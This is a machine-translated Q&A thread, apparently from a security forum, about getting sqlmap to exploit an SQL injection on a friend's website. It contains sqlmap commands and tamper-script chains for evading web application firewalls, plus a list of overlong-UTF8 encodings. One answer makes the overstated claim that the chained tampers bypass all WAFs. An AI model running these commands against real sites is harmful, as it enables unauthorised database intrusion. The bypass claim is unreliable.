Inyección especial de sqlmap

2

Actualmente estoy atestando el sitio web de mis amigos. Encontré una inyección SQL con la ayuda de acunetix:

- URL encoded GET input for was set to 1#####
Error message found: 
supplied argument is not a valid MySQL result

Así que intenté ejecutar un mapa sql normal:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25

Salida:

  

[11:16:31] [ADVERTENCIA] El parámetro URI '# 1 *' no es inyectable [11:16:31]   [CRÍTICO] todos los parámetros probados parecen no ser inyectables. Intentar   aumente los valores de '--level' / '- risk' para realizar más pruebas. También tú   puede intentar volver a ejecutar proporcionando un valor válido para la opción   '--string' (o '--regexp'). Si sospechas que hay algún tipo de   mecanismo de protección involucrado (por ejemplo, WAF) tal vez podría volver a intentarlo con un   opción '--tamper' (por ejemplo, '--tamper = space2comment')

Así que necesito una forma de incluir esos # 's (for=1%00%c0%a7%c0%a2) Intenté --string y --suffix pero no hizo el trabajo. Tal vez hay una manipulación para esto?

    
pregunta nickvl 04.09.2016 - 19:17
fuente

2 respuestas

1

Estos caracteres son demasiado largos-UTF8: '=% 27 =% c0% a7 =% e0% 80% a7 =% f0% 80% 80% a7 "=% 22 =% c0% a2 =% e0% 80% a2 =% f0% 80% 80% a2 < =% 3c =% c0% bc =% e0% 80% bc =% f0% 80% 80% bc ; =% 3b =% c0% bb =% e0% 80% bb =% f0% 80% 80% bb &erio; =% 26 =% c0% a6 =% e0% 80% a6 =% f0% 80% 80% a6 \ 0 =% 00 =% c0% 80 =% e0% 80% 80 =% f0% 80% 80% 80

Si está utilizando SQLMAP, puede usar --tamper = overlongutf8 para explotar la vulnerabilidad.

    
respondido por el lmiller 05.01.2017 - 02:13
fuente
1

Hay una forma más en la que puedes usar todos los manipuladores en una línea así:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Al usar esto, puedes pasar sobre todos los WAF.

    
respondido por el Oya Ü. 22.02.2017 - 17:02
fuente

Lea otras preguntas en las etiquetas